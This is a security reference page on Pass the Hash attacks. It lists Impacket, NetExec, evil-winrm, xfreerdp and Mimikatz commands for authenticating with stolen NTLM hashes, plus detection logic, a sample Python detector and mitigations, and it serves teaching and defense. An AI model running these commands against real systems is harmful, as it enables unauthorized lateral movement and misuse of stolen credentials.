Pass the Hash

Overview

Pass the Hash (PtH) authenticates to remote services with a user's NTLM (NT) hash instead of the plaintext password. In NTLM authentication the password itself is never sent; the client proves possession of the NT hash when it answers the server's challenge, so a captured hash can be used directly for authentication without cracking it. PtH works against SMB, WinRM, RDP (Restricted Admin mode), LDAP, MSSQL, and any other service that accepts NTLM authentication.

ATT&CK Mapping

  • Tactic: TA0008 - Lateral Movement
  • Technique: T1550.002 - Use Alternate Authentication Material: Pass the Hash

Prerequisites

  • Valid NTLM hash for a domain or local user
  • Network access to the target service (SMB 445, WinRM 5985, etc.)
  • Target must accept NTLM authentication (not Kerberos-only)

Techniques

SMB (PsExec / WMI / SMBExec)

# Impacket — PsExec with hash
# https://github.com/fortra/impacket
impacket-psexec '<domain>/<user>@<target>' -hashes ':<ntlm_hash>'

# Impacket — WMIExec with hash
impacket-wmiexec '<domain>/<user>@<target>' -hashes ':<ntlm_hash>'

# Impacket — SMBExec with hash
impacket-smbexec '<domain>/<user>@<target>' -hashes ':<ntlm_hash>'

# NetExec — SMB with hash
# https://github.com/Pennyw0rth/NetExec
nxc smb <target> -u <user> -H <ntlm_hash>

# Execute commands
nxc smb <target> -u <user> -H <ntlm_hash> -x "whoami"

# Spray hash across multiple targets
nxc smb <targets_file> -u <user> -H <ntlm_hash>

WinRM

# Evil-WinRM
# https://github.com/Hackplayers/evil-winrm
evil-winrm -i <target> -u <user> -H <ntlm_hash>

# NetExec — WinRM with hash
# https://github.com/Pennyw0rth/NetExec
nxc winrm <target> -u <user> -H <ntlm_hash>

RDP (Restricted Admin Mode)

RDP with pass-the-hash requires Restricted Admin mode enabled on the target:

# xfreerdp
# https://github.com/FreeRDP/FreeRDP
xfreerdp /v:<target> /u:<user> /pth:<ntlm_hash> /d:<domain>

Enable Restricted Admin on the target (requires admin access; this registry change is itself worth alerting on, because it is a common precursor to RDP-based PtH):

reg add "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 0 /f

LDAP

# NetExec — LDAP with hash
# https://github.com/Pennyw0rth/NetExec
nxc ldap <dc_ip> -u <user> -H <ntlm_hash> --users
nxc ldap <dc_ip> -u <user> -H <ntlm_hash> --kerberoasting output.txt

MSSQL

# NetExec — MSSQL with hash
# https://github.com/Pennyw0rth/NetExec
nxc mssql <target> -u <user> -H <ntlm_hash> -q "SELECT system_user"

# Impacket
# https://github.com/fortra/impacket
impacket-mssqlclient '<domain>/<user>@<target>' -hashes ':<ntlm_hash>' -windows-auth

Mimikatz Pass-the-Hash

From Windows with Mimikatz:

# Mimikatz
# https://github.com/gentilkiwi/mimikatz
mimikatz# sekurlsa::pth /user:<user> /domain:<domain> /ntlm:<ntlm_hash>

This spawns a new process (a NewCredentials logon, type 9) whose outbound network authentication uses the supplied hash instead of the current user's credentials. It requires local administrator rights on the host, since it alters credential material held by LSASS.

Detection Methods

Network-Based Detection

  • NTLM authentication from unusual source hosts (e.g. a workstation authenticating over SMB or WinRM to many servers in a short window)
  • NTLM authentication for accounts that normally use Kerberos, or any NTLM traffic in segments where Kerberos is expected

Host-Based Detection

  • Windows Security Event 4624 (Logon) with Logon Type 3 (network), Authentication Package NTLM, and a non-anonymous account; on domain controllers, correlate with Event 4776 (NTLM credential validation) from unexpected source workstations
  • On the source host, Event 4624 with Logon Type 9 (NewCredentials) and Logon Process seclogo, the pattern left behind by sekurlsa::pth
  • Unusual process creation (Event 4688 or Sysmon Event 1) tied to the logon session created by a network logon
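As an added example (not part of the original page), the host-based indicators above expressed as detection logic over a constructed batch of Security events. Field names follow the 4624 / 4688 event schema; the hosts, users, logon IDs and the "Kerberos-only" account set are invented for the example.

```python
"""Flag Pass-the-Hash indicators in Windows Security events (constructed sample)."""
from collections import defaultdict

# Constructed sample records using 4624 / 4688 schema field names.
# Hosts, users and logon IDs are invented for this example.
SAMPLE_EVENTS = [
    {"EventID": 4624, "LogonType": 3, "AuthenticationPackageName": "Kerberos",
     "LogonProcessName": "Kerberos", "TargetUserName": "alice",
     "IpAddress": "10.0.0.5", "TargetLogonId": "0x1a2b"},
    {"EventID": 4624, "LogonType": 3, "AuthenticationPackageName": "NTLM",
     "LogonProcessName": "NtLmSsp", "TargetUserName": "svc_backup",
     "IpAddress": "10.0.0.9", "TargetLogonId": "0x3c4d"},
    {"EventID": 4688, "SubjectLogonId": "0x3c4d",
     "NewProcessName": "C:\\Windows\\System32\\cmd.exe"},
    {"EventID": 4624, "LogonType": 3, "AuthenticationPackageName": "NTLM",
     "LogonProcessName": "NtLmSsp", "TargetUserName": "ANONYMOUS LOGON",
     "IpAddress": "10.0.0.7", "TargetLogonId": "0x3e7"},
    {"EventID": 4624, "LogonType": 9, "AuthenticationPackageName": "Negotiate",
     "LogonProcessName": "seclogo", "TargetUserName": "bob",
     "IpAddress": "::1", "TargetLogonId": "0x5e6f"},
]

KERBEROS_ONLY = {"svc_backup"}   # assumed: accounts expected to use Kerberos


def flag_pth_indicators(events, kerberos_accounts=KERBEROS_ONLY):
    """Return (reason, TargetUserName, logon id) tuples for suspicious logons."""
    hits = []
    # Processes started under each logon session (4688 SubjectLogonId == 4624 TargetLogonId).
    procs = defaultdict(list)
    for ev in events:
        if ev.get("EventID") == 4688:
            procs[ev.get("SubjectLogonId")].append(ev.get("NewProcessName"))
    for ev in events:
        if ev.get("EventID") != 4624:
            continue
        user = ev.get("TargetUserName", "")
        lid = ev.get("TargetLogonId")
        if (ev.get("LogonType") == 3 and ev.get("AuthenticationPackageName") == "NTLM"
                and user != "ANONYMOUS LOGON"):
            reason = "ntlm-network-logon"
            if user.lower() in kerberos_accounts:   # NTLM where Kerberos is expected
                reason = "ntlm-for-kerberos-account"
            if procs.get(lid):                      # process spawned under that session
                reason += "+process-spawn"
            hits.append((reason, user, lid))
        elif ev.get("LogonType") == 9 and ev.get("LogonProcessName", "").lower() == "seclogo":
            # NewCredentials logon via seclogo: the trace sekurlsa::pth leaves on the source host
            hits.append(("newcredentials-seclogo", user, lid))
    return hits


if __name__ == "__main__":
    for hit in flag_pth_indicators(SAMPLE_EVENTS):
        print(hit)
```

Anonymous NTLM network logons are excluded because they are routine noise; tune the Kerberos-only account set from your own NTLM audit data before relying on that rule.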

Mitigation Strategies

  • Disable NTLM: enforce Kerberos where possible, and audit NTLM usage first to find the systems and applications that still depend on it
  • Credential Guard: isolates NTLM hashes and Kerberos keys in a virtualization-protected process so they cannot be read out of LSASS memory
  • Restrict local admin: limit which accounts hold local admin on multiple systems, and give every host a unique local administrator password (for example with LAPS) so one captured local hash does not unlock the fleet
  • Network segmentation: restrict lateral movement paths between systems, e.g. block SMB and WinRM between workstations
  • Protected Users group: members cannot authenticate with NTLM, so their hashes are useless for PtH

References

Official Documentation

MITRE ATT&CK